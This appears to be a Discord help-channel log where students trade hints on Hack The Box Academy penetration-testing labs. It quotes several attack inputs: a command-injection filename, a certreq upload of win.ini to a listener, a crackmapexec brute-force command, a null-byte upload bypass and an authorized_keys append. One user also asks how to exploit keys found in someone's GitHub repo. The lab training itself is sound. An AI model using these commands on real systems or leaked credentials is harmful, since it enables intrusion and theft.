#modules

1 messages · Page 33 of 1

iron plaza
#

Hey all, did any solve the Password Attacks - Network Services questions? Particularly in finding the username and password for RDP? For some reason the provided username.list and password.list did not work with me in crackmapexec and hydra

iron plaza
rustic sage
#

To get the flag, try to bypass the command injection filter through HTTP Verb Tampering, while using the following filename: file; cp /flag.txt ./

#

Web attacks - Bypassing Security Filters

stuck hull
#

Could anyone help with this?

placid quest
#

@stuck hull where are u stuck

midnight patio
#

Hello all. I seek help and I don't know how to process.

Talking about the "Skills Assessment - File Upload Attacks"

I don't know how to read the source code. I intercepted the POST request (uploaded an *.jpg) with Burp first. After that I tried to upload a svg because I tried to read the source code of a specific file in order to figure out where the downloads directory is. I don't know how to do that. Can you give me some hints?

vital adder
#

finally finished the pentest path after like months of procrastinating also thanks a lot to @candid zephyr and @pastel ginkgo (sorry for the ping) for helping me out on my last module

pastel ginkgo
#

Nice congrats!

#

I'm trying to finish most of it up before the end of the year.

vital adder
candid zephyr
#

Nice I plan to tackle offshore too. I'm going to sneak in some quick obfuscation courses from THM over Christmas

vital adder
#

i did get a bit sad when i found out john hammond isn't doing this for THM on Christmas any more

pastel ginkgo
#

How is the attcking enterprise networks module? I hear the assessment is tough

vital adder
#

oh no there is no assessment

#

the whole module is the assessment

pastel ginkgo
#

oh

#

neat

#

Does anyone have a good explanation for what a reverse proxy is? I've looked it up several times and I still can't put 2 and 2 together.

azure cloak
#

Hey all, i have some trouble with nmap firewall IDS/IPS medium module. I tried with source port and many option

pastel ginkgo
#

Did you try -D ?

thorn urchin
azure cloak
pastel ginkgo
azure cloak
pastel ginkgo
azure cloak
#

Have you specified a specific source port?

pastel ginkgo
#

I dont remember its been a couple months

azure cloak
#

I tried 15, 20. It doesn’t work.

#

Ok I have run exactly the same command and got the flag

#

🤔

rustic sage
marble raft
#

Hi guys! Can someone help me on Print Operators section of the Windows Privilege Escalation module?

I don't quite seem to understand how to use UACMe to bypass UAC.

Edit: You don't actually need to worry about anything. Just input the credentials you're given to get a administrative shell and proceed as shown.

azure basin
#

Hello. New here to the platfrom. I am about to start a new job thta will use Varonis and Nessus. Does HTB have training or labs on this?

torn blade
#

i have completed every module on the SQL essentials except the last 2 of attack tuning. Ive done the final assesment and everything but cant figure out this one for #6, havent tried #7 yet cause waiting to figure out 6. but fr can anyone ehlp, ive tried the prefix hint but that didnt do much. need a hint

marble raft
torn blade
#

sqlmap

#

like i was stuck on this one for wayyyy too long. just want to compelte it

azure basin
marble raft
#

Thx @graceful rampart

graceful rampart
#

Half the module is about usung nessus

#

Its definetly not like a full nessus course or anything, but it will teach you the basucs

azure basin
#

Anything on Varonis? Without having a lisc key, I am pretty much limtied to Youtube

#

The software seems really cool..guess I will learn all On the job

graceful rampart
#

I dont believe so

#

You may be able to find something somewhere but idk

marble raft
rustic sage
#

hello i have a quick question yall

azure basin
#

I am just excited to get started on the tech stuff again. I have been an ISSM (boring) for the past 1.5 years, and now I will be a Sr. Security Engr

#

SOunds like i wil be managing the vuln programs

rustic sage
#

can my ip be pulled with a software like wireshark on discord vc? no, right?

marble raft
rustic sage
#

yeah, just wanted to make sure. i join random servers and join vcs all the time so

#

was curious for my safety

torn blade
#

im going to kms

#

i was doing ')' and not '`)'

marble raft
rustic sage
#

i know that but an ip grabber is an ip grabber

dapper temple
#

Is anyone having problems spawning the target VMs from the modules? The question provides the VM ip and Port but the VM/container isn't responding....

Nevermind. I respawned it 3 times, and waited a full 10 mins and pop the VM/container is responding. longest time I had to wait yet.

candid zephyr
#

Your local IP will show on wireshark to people in your network.

#

People can't see random IPs in and out of Discord.

candid zephyr
#

You see host > Discord > host traffic.

rustic sage
simple zephyr
#

Can I get a sanity check, on File Transfers living off the land, I am attempting to run this certreq.exe -Post -config http://192.168.49.128/ c:\windows\win.ini and of course with my IP address. I have my NC listener on and when I run the command on the windows client I get a response back of (invalid argument: - POST)

iron basin
#

Damn, anyone familiar with proxychains? Having trouble with it.

marble raft
iron basin
# candid zephyr What's up?

Trying to get proxychains up and running properly. I am on the Web Proxies module, section Proxying tools. Followed the steps in which I go to edit the /etc/proxychains.conf file, comment out the socks4 127.0.0.1 9050 and add http 127.0.0.1 and https 127.0.0.1 . I save the file and try to run proxychains with the curl command as such:

proxychains curl example.com

However, I get this output:
ProxyChains-3.1 (http://proxychains.sf.net)
|DNS-request| example.com
|D-chain|-<>-127.0.0.1:9050-<--timeout
|D-chain|-<>-127.0.0.1:8080-<--timeout

!!!need more proxies!!!
|DNS-response|: example.com does not exist
curl: (6) Could not resolve host: example.com

#

Tried following the geeksforgeeks tutorial online as well lol. Im missing some key point in how to settup proxies properly.

simple zephyr
marble raft
#

Weird, let me boot the machine and i'll try here just a sec

candid zephyr
simple zephyr
#

thanks, reading the documentation on certreq i don't see anything on post

iron basin
#

@candid zephyr This is the proxy list section:

[ProxyList]

add proxy here ...

meanwile

defaults set to "tor"

socks5 127.0.0.1 9050
http 127.0.0.1 8080
https 127.0.0.1 8080

I have dynamic chaining uncommented alongside proxy_dns uncommented as well.

candid zephyr
#

try just the socks5 proxy

#

also does the module tell you to systemctl start tor.service?

#

or is that not the point of this module (I haven't done it)

iron basin
#

It does not say to do that. Just starts off with saying to comment the socks4 127.0.0.1 9050 out, then add http and https 127.0.0.1 8080

#

And to enable quit mode lol

vital adder
#

oh yeah i forgot the protocol in that

iron basin
#

I did try to experiment with use netcat to listen on those ports. Just to see what would happen, it caught the traffic. But timed out still lol

vital adder
#

not sure how to would work but of course you will need a proxy server to route the proxy traffic

candid zephyr
#

i don't really understand what it'd be doing without tor running or something else

#

you're just routing traffic into nothing. are you supposed to have burp open?

#

mrtom probably more use i've not done the module x)

iron basin
#

I realize that now, sorry a bit uneducated in the matter! And yes your suppose to use burp with it. Was trying yesterday but hadnt managed to get it. Reading online on somethings, gonna try it again.

vital adder
vital adder
candid zephyr
#

burp you'd use foxyproxy in your browser, not proxychains and curl.

iron basin
vital adder
#

oh that kinda make sense

vital adder
iron basin
pastel ginkgo
#

@vital adder For the Attacking common applications, attacking tomcat. How did you get any directory traversal? I cant get metasploit to work or any other shell other than the first they mention and I cant get anything more then simple ls commands

#

like ls /root wont work but ls -la will q.q

candid zephyr
#

life is too short to route traffic through tor

#

you'll want to die

vital adder
#

the routing will finished after you die

iron basin
#

xD , well shit.

#

Have yall completed the Web proxies module?

pastel ginkgo
#

nvm I got some directory traversal not to find the damn flag

vital adder
pastel ginkgo
vital adder
#

oh wait nope the metasploit thing in my note was for brute forcing 🤣

pastel ginkgo
#

same thing if I use their venom payload

#

it wont work

vital adder
#

but for some reason in my note i make a elf payload and get a meterpreter shell from the RCE thing before i get the flag

vital adder
# pastel ginkgo

just like the eternal blue one this only work like half of the time for me

pastel ginkgo
#

lol I found the flag for the next section but I cant find it for this damn tomcat one

#

it drops me into the root directory and theres like 10 flags on this damn machine with different names xD

#

found the flag, it just wont read it x)

vital adder
#

oh wait i just double check they did give you the flag name you can just use a find command with that name

elfin timber
#

question for some ppl in here: Are you all knocking out the modules and then doing some machines or are dabbling in both? Trying to grasp what is the optimal approach here. thank you!

pastel ginkgo
#

I tried attacking the machines, failed miserably went back to acad to learn more

iron basin
#

Mine is chaotic, dont do my method lol. I am just jumping around and doing the modules I can understand and knock out. Then I go to machine to view walkthroughs to understand how they do it. @elfin timber

pastel ginkgo
#

Im following the pathway, they build off each other but sometimes will reference modules that are far towards the end

#

like I hear the AD prive Esc module is handy for the AD module

elfin timber
#

Im using this to supplement my learning for OSCP. I felt that there was gaps of learning from the PWK that Im trying to fill with the modules. For example, at the end of the "Gettting Started" module there was a list of retired machines at the bottom of the page. Are you suppose to do those before moving on to other modules are is it discretionary?

candid zephyr
#

I've only done a couple of modules as a refresher before I buy Offshore pro labs. I prefer the CTFs for learning but there's some subjects that are handy to just bosh through.

candid zephyr
elfin timber
#

yeah I have the TJ list

candid zephyr
iron basin
#

@vital adder Okay, so I am believing I am understanding the issue now. In the conf file for proxychains, the default proxy is: socks4 127.0.0.1 9050 which is the default(uses tors network). The module doesn't mention using tor and seems like yall are against it due to slowness. So you mustve used another proxyserver of your own(free ones online or create your own?) in order to get proxychains to work properly. I am starting to understand that ye, I don't have any actual servers to route the traffic through lol. But, I mean there must be a way to create a simple one on your own machine no? Curious how you did it.

vital adder
elfin timber
iron basin
vital adder
#

@iron basin forgot network chuck have a video on this https://www.youtube.com/watch?v=qsA8zREbt6g

hide yourself, become anonymous with Kali Linux and ProxyChains, learn more here: (30% OFF): https://bit.ly/itprotvnetchuck or use code "networkchuck" (affiliate link)

**This video and my entire CEHv10 journey is sponsored by ITProTV

watch the entire series: https://bit.ly/cehseries

👊👊👊JOIN MY MISSION: https://bit.ly/thisisitio (thisisIT me...

▶ Play video
iron basin
#

Ah yes, beard coffee hacker man

vital adder
#

no that's a hacking pug

iron basin
#

0.0

#

Side rant, anyone ever still use text emojis or know what they are lol?

pastel ginkgo
#

do you mean the correct kind like 🙂 or that ugly 😄

#

oh god

iron basin
#

haha lmao

pastel ginkgo
#

it change it to the new version

#

"=)"

iron basin
#

;D

pastel ginkgo
#

ha take that

meager topaz
#

someone tell me how to setup the wifi of linux i connect the wifi but i cant`t serve the internet i install linux as a mian os

#

main os how to setup the internet

iron basin
#

What linux OS did you use?

meager topaz
#

kali

#

kali linux

iron basin
#

And you dont have access to the internet? But are able to connect to wifi?

meager topaz
#

yes!

iron basin
#

ugh, I think I had this issue once. Lemme try to remember haha

meager topaz
#

i install all linux disto like kali parrot mint ubantu but wifi show and connet but i cant acces internet

pastel ginkgo
#

what is your ip

#

are you pulling an appia?

#

did you set up for dhcp

meager topaz
#

i ping gooogle.com but not ping not give answer and send packets

meager topaz
pastel ginkgo
#

private

meager topaz
#

yes

pastel ginkgo
#

yeah can you ping 8.8.8.8

meager topaz
#

i try all this solution but can`t solve this problem

pastel ginkgo
#

if you can your online if you cant ping google.com its a dns issue

iron basin
#

Can you see other computers on your network?

meager topaz
#

no my wifi work properly

iron basin
meager topaz
#

i not try

iron basin
#

Can you run it and show the output of that?

meager topaz
#

okay bro

iron basin
#

Well, maybe dm me the output, not sure if ya want to reveal any potentially sensitive IP info

#

that or hide ya real IP address before ya send it lol

midnight patio
#

meh, I'm still stuck with the Skills Assessment - File Upload Attacks module. I can't figure it out how to read the source code :/

desert vault
#

Hi! I have a problem with a question in a module

#

I have to do JSON POST and there i have to use a cookie, but it says that I need a valid authentication cookie

pastel gale
#

anyone do the password mutation module recently

pastel gale
#

i need help with mysql part of password attacks module

#

kira

cerulean pollen
#

If someone is able to help me, I am stuck on Case# 5 on the SQLMAP Essentials module. I've got the flag, but it's not working.

rustic sage
#

a base application with nothing just the icon as an app

spare condor
#

Hey! I'm trying to SSH into the machine on Password Attacks / Pass the Ticket (PtT) from Linux. I can't. Can someone tell me what I'm doing wrong? Does anyone else facing the same issue? (I tried both my own VM and Pwnbox)

rustic sage
#

Hi, I'm new, I'd like to learn hacking and I'm really looking forward to being the best of myself. I'm from Peru.prayge

autumn pilot
fathom pendant
rustic sage
#

In the PIVOTING, TUNNELING, AND PORT FORWARDING Skills Assessment, i dumped the lsass.dmp file on the windows box, but i don't know how to bring mimikatz on this machine to exploit the lsass file. I can transfer it to the Linux box but unable to upload it to its webeserver since i'm connected with sskey and not password (so unable to sudo). Any idea?

midnight patio
thorn urchin
#

by sskey do you mean rsa key?

#

if so you can absolutely transfer files with scp using a rsa key

rustic sage
rustic sage
thorn urchin
#

you can proxychains scp too

rustic sage
storm jackal
magic valve
#

Hey everyone. I'm currently on Active Directory Enumeration & Attacks - AD Enumeration & Attacks Skills Assessment Part 1 question 4. I went back to connect to a previous module which landed me on HOST MS01. I got domain admin on MS01 and the flag.txt is not located on the Adminstrator's desktop. Am I coming at this the right way? I would appreciate any help. I have been stuck for quite some time.

midnight patio
storm jackal
thorn urchin
midnight patio
storm jackal
keen obsidian
#

I am making the module web requests

#

but I dont know why when I try to curl a file

#

I don't get a response

#

it just keeps thinking

#

I re-downloaded and connected the vpn, reset the target a couple of times and checked my internet connection

#

but I can't curl the file

#

1 sec

#

Module: Web requests
Section: 219

when I try to curl a file I don't get a response, it just keeps thinking, I re-downloaded and connected the vpn, reset the target a couple of times and checked my internet connection
but I can't curl the file

#

I also tried

#

curl 68.183.47.198:31307/download.php

#

like the example above shows

#

Akex06@htb[/htb]$ curl -O inlanefreight.com/index.html

#

"To get the flag, start the above exercise, then use cURL to download the file returned by '/download.php' in the server shown above. "

#

am I doing something wrong?

#

hmm

#

let me try

#

do people like the pwnbox?

sterile hawk
keen obsidian
#

I aint hating on it, I just said I don't like it

#

do I need to connect to the vpn on the pwnbox?

#

still the same issue

#

wget works?

fathom pendant
#

It might

keen obsidian
#

curl -O?

#

and curl -o for giving it a name

fathom pendant
#

I just end up doing a > {filename}. type

#

im sure curl --help is more useful ¯_(ツ)_/¯

keen obsidian
#

still the issue idk why

#

I searched up for "Web Requests htb" on youtube and the guy got the file with the same command I did

fathom pendant
#

Are you able to connect to the actual url still?

#

Because that may be the main issue

keen obsidian
#

no

fathom pendant
#

Well there's your problem

#

:)

keen obsidian
#

I reseted the target 2 times already and now you tell me to reset it and it works

#

ty still <3

fathom pendant
#

Sometimes the modules are touchy

#

I had one where I put the command in correctly on my VM but it didn't output correctly/copy paste to pwnbox worked lol

#

Btw if you are in a situation where pwnbox works but yours doesn't try redownloading your vpn file and reconnecting

keen obsidian
#

kk ill try it next time

#

is there a way of refunding a module?

#

I bought for 10 cubes the introduction to network module and I reaised that I already have learned that in school

#

like 2 weeks ago

magic valve
# thorn urchin 1. minor nitpick but you dont have domain admin yet, thats a very special role. ...

I’m still getting use to the AD hacking terminology/lingo and incorrect with “domain admin” (was just assuming as I could read access Administrators directories). Thank you for pointing that out and making me aware. I have restarted the machine and still there is no flag.txt in Administrators. To further clarify I connected to #module:Active Directory Enumeration & Attacks #section:Credentialed Enumeration-from Windows for this as I was unable to evil-winrm into the machine on the #section:Skills Assesment Part | with the credentials from question 2 and 3.

thorn urchin
#

While similar, the assessment environment is different than the section environment

#

you HAVE to do it from the assessment instance

fathom pendant
#

i mean that means you should breeze through it. I have a CompTIA Net+ cert and I still am prob gonna take the htb networking or you can potentially submit any errors you find in #858470491676737536 with corrections ¯_(ツ)_/¯

#

@keen obsidian

keen obsidian
thorn urchin
#

all of the 10 cube modules should refund you on completion

keen obsidian
magic valve
# thorn urchin While similar, the assessment environment is different than the section environm...

Thank you for letting me know! 🙂 I am still a little lost of how to proceed for question 4. Again I have attempted to connect via evil-winrm with the credentials from question 2 and 3 but it won’t connect. I know evil-winrm port is opened as I performed an nmap scan on the box and found it to be opened. Am I right in proceeding this way? I would very much appreciate a hint/nudge as I am lost at this point.

rustic sage
#

@magic valve whats the url i'll help

magic valve
rustic sage
#

it's at top of your web browser starting with www or https i got notes to help i think i just dont wanna search through hundreds of messages

#

@magic valve

keen obsidian
fathom pendant
#

Basically telling you the same thing as others, completing the course gives you the cubes back

rustic sage
#

ahh i see it one sec

magic valve
thorn urchin
rustic sage
#

oof unfortuantely i have not done that module i've done the ad basics though im 62% done with cpts so if you need help with other stuff in future i casn help

#

just send a dm i typically am on around 630-1130 est

magic valve
rustic sage
#

no prob 🙂

#

and always take great notes a lot of people don't but its super important bc that way when you complete all the labs you can quickly go through the questions and have solutions handy. plous note taking and documentation is an important skill for pentesting ❤️

magic valve
rustic sage
#

fo sheezy neezy

fathom pendant
magic valve
fathom pendant
#

Why are you specifying -p on nc -lvnp port

rustic sage
#

yep taking good notes on ANYTHING you don't 100% know to do off the top of your head is super important. and can save you having to struggle again with entire course when reviewing for exam

kind vessel
#

Hello, can someone help me with this pivotoing assessment question ?

magic valve
rustic sage
#

you'll def do port 3389

#

@kind vessel

#

so pivot/tunnel an nmap command and find the next device and then somehow gain access to rdp(i think)

fathom pendant
rustic sage
#

for sure my b

#

here there is a lab thats quite similar i think one sec i'll find @kind vessel

fathom pendant
#

If they're using the right commands they'll reach the right port :)

rustic sage
#

check the lab and your notes for section web server pivoting with rdp

kind vessel
fathom pendant
#

Reread the sections

rustic sage
#

might need to do via pwnbox some of the labs on here only work with pwnbox unfortuantely tho im not sure about the one you're working on

fathom pendant
rustic sage
#

alkso rdp and socks tunneling section @kind vessel

#

i knopw on pivoting the second and third lab wouldn't work except on pwnbox @fathom pendant

#

module* not lab

#

section not module lol

#

really only pivoting module is the one i had trouble with almost all the others work on vm

kind vessel
hazy grotto
#

crackmapexec winrm 10.129.193.3 -u /usr/share/seclists/Usernames/top-usernames-shortlist.txt -p /usr/share/wordlists/rockyou.txt

#

So i'm running this right now. Anyone know how long this is going to take? It's still on username root. Been about 10 mins.

thorn urchin
#

probably ages, cme is slow for bruting

pastel ginkgo
#

Can I dm anyone about the attacking common applications - Os Module?

#

i think I got 2 and 2 together but im getting 3 and not 4 so I must be missing something

cloud prism
#

guys, do you know if exists some tool that let to have a pool of value copied? Just like having more CTRL-C saved

#

maybe is the wrong channel for this question

hazy grotto
thorn urchin
#

Dont remember that one too well, but Id probably check if hydra can do winrm.

#

or see if smb is available and hydra with that, as creds will be the same as for winrm most of the time

pastel ginkgo
#

@thorn urchin Have you done the Attacking Common Applications Module yet?

split sleet
thorn urchin
#

but im in the middle of that module, probably finish it by tomorrow night I expect

pastel ginkgo
#

The OS support page one is killing me I understand how the exploit works it's just not working lol

thorn urchin
#

¯_(ツ)_/¯

#

ill see when I get there lol

#

last one I did was jenkins, so whatever's after that is what Ill be doing tonight

pastel ginkgo
#

Yeah Jenkins was cake and same for the one after that.

thorn urchin
#

yeah the module has been actually dissapointingly easy so far. I had heard a lot of people saying it was super tough as the capstone to the web section if the course

#

but maybe thats just the last third lol

rustic sage
#

Hello everyone, I just complete the XSS module, but the Finish button (at the ending section) is not displayed, could someone please check and confirm that?

rustic sage
thorn urchin
hazy grotto
rustic sage
thorn urchin
#

not a question, but an actual mark and continue

#

Screen shot the list of sections to the side

#

you have to do it for sections with no questions too btw

rustic sage
hazy grotto
#

Man I wish HTB had more hoodies with different colors.

#

Lets get some shit that pops

#

@languid fjord I'm sorry I should have asked before i dm'd you. I didn't read it until after i already sent the messages. My apologies.

thorny goblet
#

pretty common. i think if you add those 4k hdmi plug ins. it lets you bypass the problem and can adjust it again. they are cheap too

pastel ginkgo
#

@thorn urchin I found the a way in for the OS module... was stupid simple.

thorn urchin
#

good to hear, dont spoil it for me yet lol

pastel ginkgo
#

I swear I will spend 2 hours on the easy stuff and 15 mins on the hard

thorn urchin
#

hey thats kinda the whole point behind triaging to improve that lol

rustic sage
#

can anyone help em with the pivoting skill assesment

#

dm if so ❤️

civic pulsar
rustic sage
#

that module will teach you ALL you need to know

#

imo

#

its an awesome fun and singhtful module

#

insightful;*

pastel ginkgo
#

I wish it went a little deeper into double pivots though but maybe im a masochist

rustic sage
#

mayyyybe lol

#

hellscrypt have u completed it?

pastel ginkgo
#

yes

rustic sage
#

mind if i dm you?

pastel ginkgo
#

it gets really really buggy towards the end of the module

#

sure

dry parrot
#

hey, someone could help me with the Skill Assessment - Broken Authentication module?

rustic sage
#

hacking crypto is doing the world a favour.

All the WOKE engineers agree

#

now i demand u to teach me

thorn urchin
hazy grotto
solid wedge
#

Hey have a question if I am in the Pentester job role path should I use the cpts help instead of modules help

west canopy
#

sorry forgot where I was lol

west canopy
solid wedge
hazy grotto
solid wedge
hazy grotto
#

j

wet jolt
#

guys i'm in privilege escalation in getting started but i cant reach the root's flag.Someone can help me? I'm stuck :/

#

I got the user2 flag and I can see the path cat /root/.ssh/ with the
authorized_keys ,id_rsa and the id_rsa.pub

#

but I really don't know how to access to root privilege

#

I'm feeling dumb xD

fathom pendant
wet jolt
#

User 2 can do bash!But in my mind i think that we just can cat the id_rsa_pub and then logout and do root@IP -i [A VERY LONG ID_RSA.PUB]..but when i try to do this i have no response from server.Instead if i try to echo "ssh-rsa AAAAB...SNIP...M= user@parrot" >> /root/.ssh/authorized_keys i haven't the permission

wet jolt
#

i try to chmod but permission denied

fathom pendant
#

What can we do with their key

#

Since we can see that

#

Hint: module tells you

wet jolt
#

SO I learned that the private key is in our local machine and we use to log without password BUT (and that s a thing that idk if it's true) if we can add the rsa.pub on the authorized.key we can skip the password and got the privilege...but i can tfigure out how to do it :/

graceful rampart
#

is that too spoilery? idk

wet jolt
#

can t upload screenshot

graceful rampart
#

If you can read a private key then im 100% sure that what you need to do was explained in the module

#

feel free to dm me

fathom pendant
#

DM me or tux because you are super close to the answer

graceful rampart
#

^

fathom pendant
#

We can't say much more without it ending up in spoiler territory

thorn urchin
wet jolt
# graceful rampart feel free to dm me

Ok so i m try to explain the problem. I have the key ok? but if i logout and copy and do root@ip -pPORT -i VERY LONG KEY i didn't have response from server.this is my problem

wet jolt
graceful rampart
fathom pendant
thorn urchin
graceful rampart
fathom pendant
#

But as said, the module tells you explicitly what to do

hazy grotto
#

tree connect failed: NT_STATUS_BAD_NETWORK_NAME

#

I'm trying to connect to smb

#

how can i find out the network name?

wet jolt
#

i have vim.

graceful rampart
hazy grotto
#

Been working on this question for 4 hours lol

graceful rampart
hazy grotto
#

de nada

keen obsidian
#

Use cURL from your Pwnbox (not the target machine) to obtain the source code of the "https://www.inlanefreight.com" website and filter all unique paths of that domain. Submit the number of these paths as the answer. can someone help me with this

#

I don't know how to start

wet jolt
#

Load key "id_rsa": invalid format when i try to ssh root@etc. xD

hazy grotto
#

How can i figure out the name of this share name.

#

I have the creds, but cant connect.

#

──(ruderaph㉿kali)-[~]
└─$ smbclient -N -L //10.129.202.136
session setup failed: NT_STATUS_ACCESS_DENIED

graceful rampart
fathom pendant
hazy grotto
blissful verge
#

an early Christmas gift from the Academy team!

wet jolt
hazy grotto
#

Does anyone have silver annual membership?

lethal schooner
#

@blissful verge 500 cubes for crackmapexec. I honestly never heard of it until I started the password attacks module. You think it's worth while to learn it in depth?

hazy grotto
lethal schooner
#

haha I know..

#

500 cubes is a lot though!

hazy grotto
#

IDK ive been on silver. for the last year. I have the entire pentest unlocked, and 400 extra..

thorn urchin
lethal schooner
#

@hazy grotto I was thinking about silver, but I'm 50 percent done on pentest path, and I'm not really interested in bug bounties.

#

The one on one help is interesting though.

hazy grotto
#

I'm thinking of getting the annual to get the tutoring.

#

Just want to know hwo the response time is.

lethal schooner
#

yeah, same.

solid wedge
solid wedge
blissful verge
fast tree
#

hi, you finish sill assessment 2 no sqli?

rustic sage
#

I’m hoping for more macOS content🤞🏻🤞🏻

#

for skill assesment i'm trying to upload mimikatz to windows machine however i can't figure out how. smb, http server, nothing works. i have a meterpreter session.

#

i think i need to port forward but what i'm trying isnt working

karmic spade
#

Hello there hope you guys are well!

graceful rampart
#

Anyone seen this error before with hydra? Trying to brute force ssh in the network services section of the password attacks module

rustic sage
#

maybe reset machine not sure tho

graceful rampart
graceful rampart
#

bro what?????

hazy grotto
graceful rampart
graceful rampart
#

Am i doing something wrong?

karmic spade
#

did anyone did the machine three in the learn the basics section ?

hazy grotto
#

Wait

graceful rampart
vital adder
hazy grotto
#

im going to dm you

graceful rampart
#

They shouldnt effect how it runs

hazy grotto
#

I was looking at the wrong one. I ran a few different ones

graceful rampart
graceful rampart
# graceful rampart

Alright, if anyone needs help with this one, I found a workaround. The machine is still broken but I found a way to get all the logins

#

(Its most definetly not inteded tho, and if ti is then whoever designed this module needs a kick in the head)

rustic sage
#

I'm very lost on the live engagement section of the payloads & shells module. I know what to do but I think I'm not understanding a network detail here because I cannot access any of the targets.

graceful rampart
rustic sage
#

I have, but theres no internet application?

#

How can I access the webserver?

graceful rampart
#

I had the same issue

rustic sage
#

Bruh. Okay did not know that was a thing, thank you.

graceful rampart
#

idk why tf theres no shortcut for it

#

I spent like 30 minutes trying to figure out what i was supposed to do

restive steppe
#

I'm also unable to ssh using root. It constantly times out too

pastel ginkgo
#

@vital adder For the Attacking Common Apps Skills Assessment 1, I can see the flag but I can't read it. I also cant get a reverse shell with metasploit, powershell or any other way. Any ideas? im so close lol

pastel gale
#

Password attacks Kira username to get mysql

#

Any hint?

vital adder
pastel ginkgo
#

oo ghost cat is a good idea

#

i just got it in there and tried directly going to it and got an error lol

#

HAZAH i got it

#

fuck me

fathom pendant
#

I'll go get the lube

restive steppe
#

I'm stuck on the second question for Privilege Escalation. So basically my understanding is the private SSH key for this root account is viewable by anyone because it was improperly secured with chmod 644 instead of chmod 600. This misconfiguration allows you as the attacker to copy the root's ssh key to a file on user2's account, name it id_rsa, set the permissions to chmod 600, then ssh into root account using 'ssh root@<ip> -p<port> -i id_rsa' . However, when I do this, the ssh command just hangs and times out. I've tried resetting the vm and the HTB attack box; I've tired using my on vm, I checked the discord server and found several people had the same issue but it's still not working for me. The only other thing I can think of is to change the ownership of the id_rsa file from user2 to root but i was unsuccessful with this because it asked me for user2's password.

graceful rampart
restive steppe
# graceful rampart send me a dm with a screenshot of the error.

Thanks again for helping me fix this issue. Its working now and I will never forget this lesson! So I made two mistakes: 1) I tried to ssh into the root account from an existing user1 ssh session; and 2) I had some space to the right of the last character (-) of the private SSH key, which resulted in the ssh root command prompting me for the password inspite of the fact that I supplied it with the id_rsa file. 👍🏻

graceful rampart
#

👍 😎 🎉

fathom pendant
#

lessons learned :D

#

also nfs is super simple compared to smb LOL i guess because we stay in linux

midnight patio
#

Good morning. Could anyone help me bypassing the upload filter in the skill assessment center in the upload module?

modern mulch
#

anyone finished "User4 has a lot of files and folders in their Documents folder. The flag can be found within one of them" from "Introduction to Windows Command Line"

ripe badge
#

Password Mutations: i get always the message: Please specify the hash-mode with -m [hash-mode].

#

.\hashcat .\Password-Attacks\password.list -r .\Password-Attacks\custom.rule

twin swallow
#

@everyone any of you know about cybersecurity Saas apps if yes can you pls tell me what these companies and apps are not providing

serene wolf
modern mulch
#

yes

serene wolf
#

Did you find it harder than when we had to look for the Waldo.txt file earlier on?

vital adder
serene wolf
novel matrix
#

@ripe badge bot commands do not belong here. Reason why we have #bot-commands for a reason

meager topaz
#

someone can tell me best and free portforwading for msf

placid quest
#

@meager topaz what

meager topaz
#

port forwading

#

free port forwading in kali linux without router or real ip

fathom pendant
#

imagine thinking this chat is going to be useful for something like that :^)

meager topaz
#

yes

midnight patio
#

This might be a stupid question but let's assume I'm able to upload a php file with burp. The extension to bypass the filter is .php\x00.jpg. how on earth do I access this file in the browser?

fathom mortar
#

Hello guys, can someone help me on Enumeration with NMAP Module ?

placid quest
#

@meager topaz do u think that is possible 🤔

pastel gale
#

Password mutation
User : Kira
MySql
Howw

real hollow
#

Hello everyone....

#

I am newbies in here. Just looking around here and try to learn something but don't understand what you all chatting.😁

real hollow
kind vessel
#

Hello i'm on pivot assessment i find the second user || i find known_hosts in the first windows machine || but i dont know how to exploit it can someone help me ?

vital adder
#

so you are on the first machine? and if you found the user cred for the second machine you can just pivot and rdp in

fathom mortar
#

Does someone have the NMAP Module ?

vital adder
#

sure what's the issue?

fathom mortar
#

Can i dm you

vital adder
#

sure

vital adder
# pastel gale Password mutation User : Kira MySql Howw

https://www.youtube.com/watch?v=53zkBvL4ZB4
also hint ||mutate the|| given cred

I try to answer every question I get. Unfortunately a lot of them are extremely low effort and waste my time. I love to help, but please put some work into your question.

-=[ 🔴 Stuff I use ]=-

→ Microphone:* https://geni.us/ntg3b
→ Graphics tablet:* https://geni.us/wacom-intuos
→ Camera#1 for streaming:* https://geni.us/sony-camera
→ Lens for ...

▶ Play video
fathom pendant
vital adder
fathom pendant
#

I Work helpdesk at a callcenter but it bothers me so much when people are asking the "why does this break" and it's like "I don't know, i wasn't running windbg when your system crashed"

vital adder
#

yea it does get annoying when people are asking stupid question like that or "how to hack"

fathom pendant
#

how to hack; step 1; get compyuta step 2; google

desert vault
#

Hi! I think i have found a mistake in a module!

vital adder
#

which section and wtf what happened to your font?

#

so for that do some research on the WordPress xmlrpc attacks like the question said and if you found some exploit code you can send it with curl like in the example

#

also a tip for this section is when you got the right output throw it in some thing like sublime text and look for the strings: <string> and the number of matched should be the answer

desert vault
keen obsidian
#

can someone help me with this

#

Use cURL from your Pwnbox (not the target machine) to obtain the source code of the "https://www.inlanefreight.com" website and filter all unique paths of that domain. Submit the number of these paths as the answer.

fathom pendant
fathom pendant
spare condor
#

Password Attacks / Pass the Ticket (PtT) from Linux, Q5. The python KeyTabExtract script only gave me the AES-256 hash and not the NTLM. How will I crack this hash? And/Or how can I use Rubeus (on the Linux machine that I have access)?

(screenshot of the results:)

forest tapir
#

there's something weird about that module, idk man.

sometimes the tickets update, sometimes they don't. I just got lucky

#

i eventually stopped doing academy. saving up money for OSCP instead

#

hopefully you've been taking notes as well, because "Kira" comes back later

if you didn't save her password, you're in trouble

#

that was the last straw. it's my own fault for not keeping notes, but still...

kind turret
forest tapir
#

i did not

#

it just magically worked one day

#

did you check both key tabs?

midnight patio
#

Have anyone finished the lfi module and the skill assessment? I'm not sure if my connection is bugged but I can't receive the source code of the php files

shrewd oak
#

Hello

Looking for help in Rasta - Prolab

#

Is this the right place ?

shrewd oak
near dove
fathom pendant
dusty citrus
#

guys

#

I found a SIGNING_KEYID, SIGNING_PWD, OSS_USER , OSS_PW and GITHUBKEY in a github repo, how can i exploit now? in a travis.yml file

near dove
near dove
dusty citrus
near dove
uncut cave
#

can anyone help on the last question of the assessment in "Active Directory LDAP"

#

I'm confused of what its looking for

lament tartan
vital adder
frigid monolith
#

What is the default htb user and PW for neo4j? I'm trying to do the ad bloodhound module.

#

neo4j:neo4j didn't work and neither does neo4j:bloodhound

vital adder
#

i didn't do that module so i can't help with that but if you are on the pwnbox and can't login stop neo4j and run

frigid monolith
#

Ty I'll try that

acoustic owl
vital adder
#

google that name give me nyan cat so probably yes

#

one of the images google show of lulzsec is nyan cat

#

one of the members is nyan cat?

summer lava
#

i got a Steganography PNG images encrypted with passphrase
